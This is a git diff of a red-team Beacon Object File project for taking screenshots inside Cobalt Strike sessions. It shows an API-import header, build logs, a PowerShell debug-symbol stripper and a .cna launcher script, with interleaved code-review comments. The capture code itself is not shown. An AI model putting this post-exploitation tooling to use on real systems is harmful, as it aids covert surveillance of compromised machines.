+DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupPrivilegeValueW(LPCWSTR lpSystemName, LPCWSTR lpName, PLUID lpLuid); +DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExW(HANDLE hProcess, HMODULE hModule, LPWSTR lpFilename, DWORD nSize); + + +/* GetLast Error */ +DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(VOID); + + +/* Directories */ +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$RemoveDirectoryA(LPCSTR); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CreateDirectoryA(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$MoveFileA(LPCSTR lpExistingFileName, LPCSTR lpNewFileName); +DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathIsDirectoryA(LPCSTR); +DECLSPEC_IMPORT BOOL WINAPI SHLWAPI$PathFileExistsA(LPCSTR pszPath); + + +/* strings */ +DECLSPEC_IMPORT PSTR WINAPI SHLWAPI$StrChrA(PCSTR pszStart, WORD wMatch); +DECLSPEC_IMPORT LPSTR __cdecl MSVCRT$strchr(LPSTR, int); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcat_s(LPSTR, size_t, LPCSTR); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strcpy_s(LPSTR, size_t, LPCSTR); +DECLSPEC_IMPORT errno_t __cdecl MSVCRT$strncpy_s(LPSTR, size_t, LPCSTR, size_t); +DECLSPEC_IMPORT int __cdecl MSVCRT$_snprintf(LPSTR, size_t, LPCSTR, ...); +DECLSPEC_IMPORT void WINAPI MSVCRT$sprintf(char*, char[], ...); +DECLSPEC_IMPORT int __cdecl MSVCRT$_vsnprintf(LPSTR, size_t, LPCSTR, va_list); +DECLSPEC_IMPORT size_t __cdecl MSVCRT$wcslen(LPCWSTR); +DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char* _Str1, const char* _Str2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpyA(LPSTR lpString1, LPCSTR lpString2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcatA(LPSTR lpString1, LPCSTR lpString2); +DECLSPEC_IMPORT LPSTR WINAPI Kernel32$lstrcpynA(LPSTR lpString1, LPCSTR lpString2, int iMaxLength); +DECLSPEC_IMPORT int WINAPI KERNEL32$lstrlenW(LPCWSTR lpString); +DECLSPEC_IMPORT LPWSTR WINAPI KERNEL32$lstrcpyW(LPWSTR lpString1, LPCWSTR lpString2); + + +/* RPC */ +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY 
Rpcrt4$RpcStringFreeA(RPC_CSTR* String); +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidCreate(UUID* Uuid); +DECLSPEC_IMPORT RPC_STATUS RPC_ENTRY Rpcrt4$UuidToStringA(const UUID* Uuid, RPC_CSTR* StringUuid); + + +/* Random */ +DECLSPEC_IMPORT void WINAPI MSVCRT$srand(int initial); +DECLSPEC_IMPORT int WINAPI MSVCRT$rand(); + + +/* DateTime */ +DECLSPEC_IMPORT time_t WINAPI MSVCRT$time(time_t* time); + + +/* SystemInfo */ +DECLSPEC_IMPORT void WINAPI KERNEL32$GetSystemInfo(LPSYSTEM_INFO lpSystemInfo); +DECLSPEC_IMPORT BOOL WINAPI KERNEL32$IsProcessorFeaturePresent(DWORD ProcessorFeature); +DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetUserNameW(LPWSTR lpBuffer, LPDWORD pcbBuffer); + + + + + + +#ifdef __cplusplus +} +#endif + + +/* helper macros */ + +#define malloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) /* trustedsec */ +#define free(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, (LPVOID)addr) /* trustedsec */ +#define ZeroMemory(address, size) memset(address, 0, size); + + +/* ----------------------------------- DEFINITIONS ------------------------------------------*/ + +/* COM */ +#define CLSIDFromString OLE32$CLSIDFromString +#define CoCreateInstance OLE32$CoCreateInstance +#define CoInitializeEx OLE32$CoInitializeEx +#define CoUninitialize OLE32$CoUninitialize +#define IIDFromString OLE32$IIDFromString +#define CoInitialize OLE32$CoInitialize +#define CoCreateInstanceEx OLE32$CoCreateInstanceEx +#define SysAllocString OleAut32$SysAllocString +#define VariantInit OLEAUT32$VariantInit +#define CoInitialize OLE32$CoInitialize +#define CoInitializeSecurity OLE32$CoInitializeSecurity + +/* memory */ +#define HeapFree KERNEL32$HeapFree +#define HeapAlloc KERNEL32$HeapAlloc +#define HeapReAlloc KERNEL32$HeapReAlloc +#define memcpy MSVCRT$memcpy +#define memset MSVCRT$memset + + +/* process */ +#define GetProcessHeap KERNEL32$GetProcessHeap +#define CreateProcessWithLogonW ADVAPI32$CreateProcessWithLogonW +#define OpenProcess 
KERNEL32$OpenProcess +#define VirtualQueryEx KERNEL32$VirtualQueryEx +#define GetProcessId KERNEL32$GetProcessId +#define ReadProcessMemory KERNEL32$ReadProcessMemory +#define GetCurrentProcess KERNEL32$GetCurrentProcess +#define Sleep KERNEL32$Sleep +#define LookupPrivilegeValueW ADVAPI32$LookupPrivilegeValueW +#define GetModuleFileNameExW PSAPI$GetModuleFileNameExW + + +/* debug */ +#define EnumerateLoadedModulesW64 DBGHELP$EnumerateLoadedModulesW64 +#define SymInitializeW DBGHELP$SymInitializeW +#define SymCleanup DBGHELP$SymCleanup + + +/* filesystem */ +#define CreateFileA KERNEL32$CreateFileA +#define SetFilePointer KERNEL32$SetFilePointer +#define SetFilePointerEx KERNEL32$SetFilePointerEx +#define WriteFile KERNEL32$WriteFile +#define GetFileSizeEx KERNEL32$GetFileSizeEx +#define GetFileVersionInfoSizeW VERSION$GetFileVersionInfoSizeW +#define GetFileVersionInfoW VERSION$GetFileVersionInfoW +#define VerQueryValueW VERSION$VerQueryValueW + +/* error */ +#define GetLastError KERNEL32$GetLastError + + +/* registry */ +#define RegOpenKeyExA ADVAPI32$RegOpenKeyExA +#define RegDeleteTreeA ADVAPI32$RegDeleteTreeA +#define RegCreateKeyExA ADVAPI32$RegCreateKeyExA +#define RegSetValueExA ADVAPI32$RegSetValueExA + + +/* directory */ +#define RemoveDirectoryA KERNEL32$RemoveDirectoryA +#define CreateDirectoryA KERNEL32$CreateDirectoryA +#define MoveFileA KERNEL32$MoveFileA +#define PathIsDirectoryA SHLWAPI$PathIsDirectoryA +#define PathFileExistsA SHLWAPI$PathFileExistsA + + +/* strings */ +#define strchr MSVCRT$strchr +#define strcat_s MSVCRT$strcat_s +#define strcpy_s MSVCRT$strcpy_s +#define strncpy_s MSVCRT$strncpy_s +#define snprintf MSVCRT$_snprintf /*beacon can't find snprintf without the preceeding '_' */ +#define wcslen MSVCRT$wcslen +#define vsnprintf MSVCRT$vsnprintf +#define lstrlenW KERNEL32$lstrlenW +#define lstrcpyW KERNEL32$lstrcpyW +#define strcmp MSVCRT$strcmp +#define lstrcpyA Kernel32$lstrcpyA +#define lstrcatA Kernel32$lstrcatA +#define lstrcpynA 
Kernel32$lstrcpynA +#define lstrlenW KERNEL32$lstrlenW +#define lstrcpyW KERNEL32$lstrcpyW +#define sprintf MSVCRT$sprintf + + +/* RPC */ +#define RpcStringFreeA Rpcrt4$RpcStringFreeA +#define UuidCreate Rpcrt4$UuidCreate +#define UuidToStringA Rpcrt4$UuidToStringA + + +/* Random */ +#define srand MSVCRT$srand +#define rand MSVCRT$rand + + +/* DateTime */ +#define time MSVCRT$time + + +/* SystemInfo */ +#define GetSystemInfo KERNEL32$GetSystemInfo +#define GetUserNameW ADVAPI32$GetUserNameW +#define IsProcessorFeaturePresent KERNEL32$IsProcessorFeaturePresent + +#else + +#endif diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log new file mode 100644 index 0000000..a901931 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.log 
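Review bot: `#define vsnprintf MSVCRT$vsnprintf` does not match the import declared earlier in this header, `MSVCRT$_vsnprintf`, so any vsnprintf call in a BOF build would reference a symbol the header never declares; it should read `#define vsnprintf MSVCRT$_vsnprintf`, mirroring the snprintf line and its comment. The `DECLSPEC_IMPORT WINBASEAPI ...` and `DECLSPEC_IMPORT WINGDIAPI ...` declarations in the BMP section apply dllimport twice, which the build log committed alongside reports as warning C4141 on each of those lines, and `#define ZeroMemory(address, size) memset(address, 0, size);` redefines the SDK macro (C4005 in the same log) and carries a stray trailing semicolon. Source.cpp calls `CreateDC`, `GetObject` and `CreateFile`, while this header only resolves the explicit `CreateDCA`/`GetObjectA`/`CreateFileA` names; that works only because the BOF configuration is compiled without `/D UNICODE` (visible in the committed log), so it is worth either calling the A names directly or noting the dependency in a comment next to those defines. `lstrlenW`, `lstrcpyW` and `CoInitialize` are each defined twice in the DEFINITIONS section.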
@@ -0,0 +1,23 @@ + Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x64 + Copyright (C) Microsoft Corporation. All rights reserved. + + cl /c /D BOF /GS- /Fo"intermediary\BOF\x64\\" /TP /c /Fo"intermediary\BOF\x64\source" Source.cpp +cl : Command line warning D9025: overriding '/Fointermediary\BOF\x64\' with '/Fointermediary\BOF\x64\source' + + Source.cpp +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition + C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 'ZeroMemory' + 
C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x64\source.obj + 1 File(s) copied + enumerating sections... + found debug section.. zeroing it... + closing stream... + done! diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog new file mode 100644 index 0000000..4c0ca66 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.command.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog new file mode 100644 index 0000000..b8fc32e Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.read.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog new file mode 100644 index 0000000..80fe074 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/CL.write.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate new file mode 100644 index 0000000..574e8b2 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: +BOF|x64|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\| diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOF.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 
diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log new file mode 100644 index 0000000..4e915dc --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.Build.CppClean.log @@ -0,0 +1,5 @@ +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\source.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x64.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.command.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.read.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x64\screenshotbof.tlog\cl.write.1.tlog diff --git a/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe new file mode 100644 index 0000000..784a6a3 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x64/ScreenshotBOFx64.recipe @@ -0,0 +1,7 @@ + + + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx64 + + + + \ No newline at end of file diff --git a/ScreenshotBOF/intermediary/BOF/x64/source.obj b/ScreenshotBOF/intermediary/BOF/x64/source.obj new file mode 100644 index 0000000..bb9578a Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x64/source.obj differ diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log new file mode 100644 index 0000000..032e56b --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.log 
@@ -0,0 +1,23 @@ + Microsoft (R) C/C++ Optimizing Compiler Version 19.27.29111 for x86 + Copyright (C) Microsoft Corporation. All rights reserved. + + cl /c /Oy- /D BOF /GS- /Fo"intermediary\BOF\x86\\" /TP /analyze- /c /Fo"intermediary\BOF\x86\source" Source.cpp +cl : Command line warning D9025: overriding '/Fointermediary\BOF\x86\' with '/Fointermediary\BOF\x86\source' + + Source.cpp +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(93): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(96): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(99): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(102): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(105): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(114): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(117): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(120): warning C4141: 'dllimport': used more than once +C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\bofdefs.h(246): warning C4005: 'ZeroMemory': macro redefinition + C:\Program Files (x86)\Windows Kits\10\Include\10.0.18362.0\um\minwinbase.h(39): note: see previous definition of 
'ZeroMemory' + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\ScreenshotBOF\intermediary\BOF\x86\source.obj + 1 File(s) copied + enumerating sections... + found debug section.. zeroing it... + closing stream... + done! diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.command.1.tlog b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.command.1.tlog new file mode 100644 index 0000000..6a73a70 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.command.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog new file mode 100644 index 0000000..6ca20fe Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.read.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.write.1.tlog b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.write.1.tlog new file mode 100644 index 0000000..b9591e2 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/CL.write.1.tlog differ diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate new file mode 100644 index 0000000..0f1e4ec --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.tlog/ScreenshotBOF.lastbuildstate @@ -0,0 +1,2 @@ +PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.27.29110:TargetPlatformVersion=10.0.18362.0: +BOF|Win32|C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\| diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOF.vcxproj.FileListAbsolute.txt new file mode 100644 index 0000000..e69de29 
diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log new file mode 100644 index 0000000..242f4fc --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.Build.CppClean.log @@ -0,0 +1,5 @@ +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\source.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\bin\bof\screenshotbof.x86.obj +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.command.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.read.1.tlog +c:\users\ethan\downloads\avexception\codex_arsenal\public\screenshot_bof\screenshotbof\screenshotbof\intermediary\bof\x86\screenshotbof.tlog\cl.write.1.tlog diff --git a/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe new file mode 100644 index 0000000..b68b3d1 --- /dev/null +++ b/ScreenshotBOF/intermediary/BOF/x86/ScreenshotBOFx32.recipe @@ -0,0 +1,7 @@ + + + C:\Users\Ethan\Downloads\AVException\CodeX_Arsenal\public\screenshot_BOF\ScreenshotBOF\bin\BOF\ScreenshotBOFx32 + + + + \ No newline at end of file diff --git a/ScreenshotBOF/intermediary/BOF/x86/source.obj b/ScreenshotBOF/intermediary/BOF/x86/source.obj new file mode 100644 index 0000000..b128ff8 Binary files /dev/null and b/ScreenshotBOF/intermediary/BOF/x86/source.obj differ diff --git a/ScreenshotBOF/resources/strip_bof.ps1 b/ScreenshotBOF/resources/strip_bof.ps1 new file mode 100644 index 0000000..059809a --- /dev/null +++ b/ScreenshotBOF/resources/strip_bof.ps1 
@@ -0,0 +1,127 @@
+function strip-bof {
+<#
+.SYNOPSIS
+ Removes debug symbols from a beacon object file
+
+ Heavily dependent on code by Matthew Graeber (@mattifestation)
+ Original code: https://www.powershellgallery.com/packages/PowerSploit/1.0.0.0/Content/PETools%5CGet-ObjDump.ps1
+ Author: Yasser Alhazmi (@yas_o_h)
+ License: BSD 3-Clause
+
+.PARAMETER Path
+
+ Specifies a path to one or more object file locations.
+
+.EXAMPLE
+
+ C:\PS>strip-bof -Path main.obj
+
+#>
+
+ [CmdletBinding()] Param (
+ [Parameter(Position = 0, Mandatory = $True)]
+ [ValidateScript({ Test-Path $_ })]
+ [String]
+ $Path
+ )
+
+
+ $Code = @'
+ using System;
+ using System.IO;
+ using System.Text;
+
+ namespace COFF
+ {
+
+
+ public class SECTION_HEADER
+ {
+ public string Name;
+ public uint PhysicalAddress;
+ public uint VirtualSize;
+ public uint VirtualAddress;
+ public uint SizeOfRawData;
+ public uint PointerToRawData;
+ public uint PointerToRelocations;
+ public uint PointerToLinenumbers;
+ public ushort NumberOfRelocations;
+ public ushort NumberOfLinenumbers;
+ public uint Characteristics;
+ public Byte[] RawData;
+
+ public SECTION_HEADER(BinaryReader br)
+ {
+ this.Name = Encoding.UTF8.GetString(br.ReadBytes(8)).Split((Char) 0)[0];
+ this.PhysicalAddress = br.ReadUInt32();
+ this.VirtualSize = this.PhysicalAddress;
+ this.VirtualAddress = br.ReadUInt32();
+ this.SizeOfRawData = br.ReadUInt32();
+ this.PointerToRawData = br.ReadUInt32();
+ this.PointerToRelocations = br.ReadUInt32();
+ this.PointerToLinenumbers = br.ReadUInt32();
+ this.NumberOfRelocations = br.ReadUInt16();
+ this.NumberOfLinenumbers = br.ReadUInt16();
+ this.Characteristics = br.ReadUInt32();
+ }
+ }
+
+
+ public class HEADER
+ {
+ public ushort Machine;
+ public ushort NumberOfSections;
+ public uint TimeDateStamp;
+ public uint PointerToSymbolTable;
+ public uint NumberOfSymbols;
+ public ushort SizeOfOptionalHeader;
+ public ushort Characteristics;
+
+ public HEADER(BinaryReader br)
+ {
+ this.Machine = br.ReadUInt16();
+ this.NumberOfSections = br.ReadUInt16();
+ this.TimeDateStamp = br.ReadUInt32();
+ this.PointerToSymbolTable = br.ReadUInt32();
+ this.NumberOfSymbols = br.ReadUInt32();
+ this.SizeOfOptionalHeader = br.ReadUInt16();
+ this.Characteristics = br.ReadUInt16();
+ }
+ }
+}
+'@
+
+ Add-Type -TypeDefinition $Code
+ Write-Host "enumerating sections..."
+ try {
+ $FileStream = [IO.File]::OpenRead($Path)
+ $BinaryReader = New-Object IO.BinaryReader($FileStream)
+ $CoffHeader = New-Object COFF.HEADER($BinaryReader)
+
+ # Parse section headers
+ $SectionHeaders = New-Object COFF.SECTION_HEADER[]($CoffHeader.NumberOfSections)
+
+ for ($i = 0; $i -lt $CoffHeader.NumberOfSections; $i++)
+ {
+ $SectionHeaders[$i] = New-Object COFF.SECTION_HEADER($BinaryReader)
+
+ if($SectionHeaders[$i].Name.Contains("debug")){
+ Write-Host "found debug section.. zeroing it..."
+ $FileStream.Close();
+ $FileStream2 = [IO.File]::OpenWrite($Path)
+ $FileStream2.Seek($SectionHeaders[$i].PointerToRawData, 'Begin') | Out-Null
+ for($x = 0; $x -lt $SectionHeaders[$i].SizeOfRawData; $x++){
+ $FileStream2.WriteByte(0)
+ }
+ Write-Host "closing stream...";
+ $FileStream2.Close();
+ Write-Host "done!";
+ return;
+ }
+ }
+ } catch {
+ Add-Type -AssemblyName PresentationFramework
+ [System.Windows.MessageBox]::Show("error stripping debug symbols: " + $_.ToString());
+ return;
+ }
+}
\ No newline at end of file
diff --git a/bin/BOF/ScreenshotBOF.x64.obj b/bin/BOF/ScreenshotBOF.x64.obj
new file mode 100644
index 0000000..6f339ac
Binary files /dev/null and b/bin/BOF/ScreenshotBOF.x64.obj differ
diff --git a/bin/BOF/ScreenshotBOF.x86.obj b/bin/BOF/ScreenshotBOF.x86.obj
new file mode 100644
index 0000000..d9e59fd
Binary files /dev/null and b/bin/BOF/ScreenshotBOF.x86.obj differ
diff --git a/bin/BOF/screenshotBOF.cna b/bin/BOF/screenshotBOF.cna
new file mode 100644
index 0000000..72d48df
--- /dev/null
+++ b/bin/BOF/screenshotBOF.cna
@@ -0,0 +1,21 @@
+#Register command
+beacon_command_register(
+ "screenshot_bof",
+ "Alternative screenshot capability that does not do fork n run",
+ "Synopsis: screenshot_bof"
+);
+
+alias screenshot_bof {
+ local('$barch $handle $data $args $target_pid');
+ println(@_);
+ # figure out the arch of this session
+ $barch = barch($1);
+ # read in the right BOF file
+ $handle = openf(script_resource("screenshotBOF. $+ $barch $+ .obj"));
+ $data = readb($handle, -1);
+ closef($handle);
+ # announce what we're doing
+ btask($1, "Running screenshot BOF by (@codex_tf2)");
+ # execute it.
+ beacon_inline_execute($1, $data, "go", $args);
+}
\ No newline at end of file
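Review bot: `$args` is declared in `local(...)` but never assigned, so the `beacon_inline_execute` call on the last line passes `$null` as the BOF argument buffer; that happens to work for a BOF that takes no arguments, but it reads as if arguments were intended, so either drop it (together with the unused `$target_pid`) or build it explicitly with `bof_pack`. The `openf`/`readb` result is also never checked, so a missing `screenshotBOF.<arch>.obj` next to the script surfaces as an opaque failure from `beacon_inline_execute` instead of a clear message; a guard after `closef` such as `if ($data is $null) { berror($1, "screenshotBOF. $+ $barch $+ .obj not found"); return; }` covers that. `println(@_);` looks like leftover debug output to the script console and should be removed.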